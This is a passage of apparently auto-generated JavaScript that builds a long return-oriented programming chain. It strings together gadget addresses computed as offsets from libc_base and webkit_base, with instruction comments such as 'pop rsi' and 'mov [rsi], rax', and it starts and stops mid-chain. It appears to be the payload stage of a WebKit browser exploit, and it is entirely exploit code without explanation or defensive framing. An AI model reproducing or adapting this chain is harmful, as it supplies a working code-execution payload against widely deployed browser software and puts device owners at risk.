libc_base+763368 //pop rcx
]);
//L911:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+101448, //L914
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L913:
db([8, 0]); // 0x8
set_gadget(webkit_base+3236123,); //pop r9
//L914:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L915:
db([15, 0]); // 0xf
set_gadgets([
webkit_base+10973692, //imul rax, rcx
libc_base+764760, //pop rsi
ropchain+101544, //L916
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+101560, //L917
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L916:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L917:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+101648, //L919
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L919:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+101704, //L920
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L920:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+101776, //L923
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L923:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+101832, //L924
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L924:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+20307877, //mov [rax], rcx
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
//L926:
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+101968, //L927
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L927:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L929:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+102088, //L932
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+102072, //L930
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L930:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L932:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+102232, //L935
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+102200, //L933
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+102216, //L934
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L933:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L934:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L935:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+102304, //L937
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L937:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+102360, //L938
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L938:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+102456, //L941
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L940:
db([8, 0]); // 0x8
set_gadget(webkit_base+3236123,); //pop r9
//L941:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L942:
db([16, 0]); // 0x10
set_gadgets([
webkit_base+10973692, //imul rax, rcx
libc_base+764760, //pop rsi
ropchain+102552, //L943
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+102568, //L944
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L943:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L944:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+102656, //L946
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L946:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+102712, //L947
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L947:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+102784, //L950
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L950:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+102840, //L951
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L951:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+20307877, //mov [rax], rcx
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
//L953:
libc_base+853989, //mov rax, rcx
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+102976, //L954
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L954:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L956:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+103096, //L959
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+103080, //L957
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L957:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L959:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+103240, //L962
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+103208, //L960
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+103224, //L961
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L960:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L961:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L962:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+103312, //L964
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L964:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+103368, //L965
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L965:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+103464, //L968
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L967:
db([8, 0]); // 0x8
set_gadget(webkit_base+3236123,); //pop r9
//L968:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L969:
db([17, 0]); // 0x11
set_gadgets([
webkit_base+10973692, //imul rax, rcx
libc_base+764760, //pop rsi
ropchain+103560, //L970
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+103576, //L971
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L970:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L971:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+103664, //L973
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L973:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+103720, //L974
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L974:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+103792, //L977
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L977:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+103848, //L978
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L978:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+20307877, //mov [rax], rcx
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
//L980:
libc_base+764760, //pop rsi
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+103984, //L981
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L981:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L983:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+104104, //L986
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+104088, //L984
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L984:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L986:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+104248, //L989
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+104216, //L987
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+104232, //L988
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L987:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L988:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L989:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+104320, //L991
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L991:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+104376, //L992
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L992:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+104472, //L995
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L994:
db([8, 0]); // 0x8
set_gadget(webkit_base+3236123,); //pop r9
//L995:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L996:
db([18, 0]); // 0x12
set_gadgets([
webkit_base+10973692, //imul rax, rcx
libc_base+764760, //pop rsi
ropchain+104568, //L997
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+104584, //L998
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L997:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L998:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+104672, //L1000
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1000:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+104728, //L1001
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1001:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+104800, //L1004
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1004:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+104856, //L1005
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1005:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+20307877, //mov [rax], rcx
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+104944, //L1007
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L1007:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1009:
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+105064, //L1012
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+105048, //L1010
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1010:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1012:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+105208, //L1015
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+105176, //L1013
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+105192, //L1014
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1013:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1014:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1015:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+105280, //L1017
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1017:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+105336, //L1018
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1018:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+105432, //L1021
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1020:
db([8, 0]); // 0x8
set_gadget(webkit_base+3236123,); //pop r9
//L1021:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1022:
db([3, 0]); // 0x3
set_gadgets([
webkit_base+10973692, //imul rax, rcx
libc_base+764760, //pop rsi
ropchain+105528, //L1023
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+105544, //L1024
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1023:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1024:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+835093, //sub rax, rcx ; sbb rdx, rcx
libc_base+764760, //pop rsi
ropchain+105632, //L1026
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1026:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+105688, //L1027
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1027:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+105792, //L1029
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L1029:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1031:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+105912, //L1034
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+105896, //L1032
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1032:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1034:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+106056, //L1037
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+106024, //L1035
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+106040, //L1036
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1035:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1036:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1037:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+106128, //L1039
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1039:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+106184, //L1040
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1040:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+106280, //L1043
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1042:
db([8, 0]); // 0x8
set_gadget(webkit_base+3236123,); //pop r9
//L1043:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1044:
db([19, 0]); // 0x13
set_gadgets([
webkit_base+10973692, //imul rax, rcx
libc_base+764760, //pop rsi
ropchain+106376, //L1045
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+106392, //L1046
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1045:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1046:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+106480, //L1048
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1048:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+106536, //L1049
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1049:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+106608, //L1052
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1052:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+106664, //L1053
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1053:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+20307877, //mov [rax], rcx
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
//L1055:
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+106800, //L1056
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L1056:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1058:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+106920, //L1061
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+106904, //L1059
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1059:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1061:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+107064, //L1064
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+107032, //L1062
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+107048, //L1063
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1062:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1063:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1064:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+107136, //L1066
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1066:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+107192, //L1067
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1067:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+107288, //L1070
